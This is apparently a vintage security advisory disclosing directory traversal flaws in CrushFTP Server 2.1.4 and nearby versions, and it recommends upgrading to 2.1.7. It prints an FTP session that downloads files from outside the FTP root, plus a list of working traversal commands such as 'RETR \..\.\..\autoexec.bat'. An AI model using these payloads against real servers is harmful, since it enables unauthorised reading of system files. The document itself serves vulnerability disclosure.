COMMAND

    CrushFTP Server

SYSTEMS AFFECTED

    CrushFTP Server 2.1.4

PROBLEM

    Joe Testa found  following.  CrushFTP  Server 2.1.4 is  a java ftp
    server.     Multiple  vulnerabilities  exist  which allow users to
    change directories outside of the ftp root and download files.

    The following is an illustration of  the problem.  An ftp root  of
    "c:\directory\directory" was used.

        >ftp localhost
        Connected to xxxxxxxxxx.rh.rit.edu.
        220-Welcome to CrushFTP!
        220 CrushFTP Server Ready.
        User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
        331 Username OK.  Need password.
        Password:
        230-Welcome!
        230 Password OK.  Connected.
        ftp> get ../../autoexec.bat
        200 PORT command successful. 127.0.0.1:1868
        150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).
        226-Download File Size:419 bytes @ 0K/sec.
        226 Transfer complete.
        ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.
        ftp> cd ...
        250 "/.../" CWD command successful.
        ftp> get command.com
        200 PORT command successful. 127.0.0.1:1870
        150 Opening ASCII mode data connection for command.com (93890 bytes).
        226-Download File Size:93890 bytes @ 92K/sec.
        226 Transfer complete.
        ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.

    The  following  is  a   list  of  vulnerabilities  which   affects
    intermediate versions (v2.1.5, v2.1.6):

        NLST ..
        NLST ...
        SIZE /../../
        SIZE /.../
        NLST \..\
        NLST /../
        NLST \...\
        RETR \..\.\..\autoexec.bat
        RETR ./\...\autoexec.bat
        RETR .\.\..\..\autoexec.bat

SOLUTION

    Upgrade to v2.1.7 at:

        http://www.crushftp.com